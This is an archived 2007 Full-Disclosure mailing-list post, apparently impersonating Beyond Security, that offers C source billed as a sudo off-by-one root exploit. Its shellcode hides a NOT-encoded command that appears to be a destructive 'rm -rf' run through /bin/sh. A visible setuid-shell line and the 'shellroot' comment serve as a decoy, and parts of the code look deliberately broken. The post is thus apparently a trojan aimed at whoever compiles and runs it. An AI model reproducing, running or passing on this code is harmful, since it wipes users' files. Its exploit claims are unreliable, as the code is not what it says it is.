lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
From: Beyond Security <beyondsequritee@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [Beyond Security] New sudo off-by-one poc exploit.

/*
 *  off by one ebp overwrite in sudo prompt parsing
function
 *  discovered by beyond security in 2007, thx ge
 *
 *  to compile: gcc -pipe -o sobo sobo.c ; ./sobo
 *
 *  please use responsibly! a patch has already been
sent 
 *  upstream and a fix will be included in the next
sudo release
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
		= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
		  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
		  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
		  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
		  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
		  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
		  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
		  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

void fill (char *buff, int size, unsigned long val) {
  unsigned long *ptr = (unsigned long *) buff;
  for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}

unsigned long get_sp (void) {
  __asm__ ("lea esp, %eax");
}

char *exp (char nops_nums, char rets_nums, char
*shellcode) {
  int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
  unsigned char *nops = alloca (nops_nums);
  unsigned char *rets = alloca (rets_nums);
  unsigned long ret = get_sp ();
  static char exp_buffer [8192];
  /* ensure isatty() fails */
  close (0); close (1); close (2);
  fill (nops, (unsigned char) nops_nums, 0x90909090);
  fill (rets, (unsigned char) rets_nums, ret);
  if (size > sizeof (exp_buffer)) {
    fprintf (stderr, "buffer is too small\n");
    return NULL;
  }
  snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
  SPROMPT, nops, shellcode, rets);
  return exp_buffer;
}

int main(int argv, char *argc[]) {
  char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
  execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
  /* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
  return 0;
}


       
____________________________________________________________________________________
Got a little couch potato? 
Check out fun summer activities for kids.
http://search.yahoo.com/search?fr=oni_on_mail&p=summer+activities+for+kids&cs=bz 


       
____________________________________________________________________________________
Looking for a deal? Find great prices on flights and hotels with Yahoo! FareChase.
http://farechase.yahoo.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ